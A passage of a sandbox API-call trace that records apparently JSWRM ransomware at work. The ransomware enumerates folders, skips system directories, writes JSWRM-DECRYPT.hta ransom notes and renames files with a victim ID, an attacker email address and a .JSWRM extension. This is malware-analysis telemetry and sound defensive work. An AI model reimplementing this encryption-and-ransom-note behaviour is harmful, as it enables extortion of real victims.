(HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\jswrm-decrypt.hta")) returned 0x20 [0067.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0067.904] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0067.904] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.904] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.904] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.904] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.904] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f228759, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f228759, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.904] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.905] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.905] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0067.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.906] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080975440827696) returned 0 [0067.906] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.906] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.906] CloseHandle (hObject=0xffffffff) returned 1 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0067.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0067.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.906] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.906] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.907] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2=".") returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="..") returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="...") returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="windows") returned -1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="recovery") returned -1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="perflogs") returned -1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="documents and settings") returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="$RECYCLE.BIN") returned 1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="system volume information") returned -1 [0067.907] lstrcmpiW (lpString1="fi-FI", lpString2="msocache") returned -1 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\jswrm-decrypt.hta")) returned 0xffffffff [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.939] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.939] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.940] CloseHandle (hObject=0x454) returned 1 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\jswrm-decrypt.hta")) returned 0x20 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.941] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f27a719, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0067.942] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.942] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f27a719, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.942] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.942] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.942] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f27a719, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f27a719, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f27a719, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.943] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 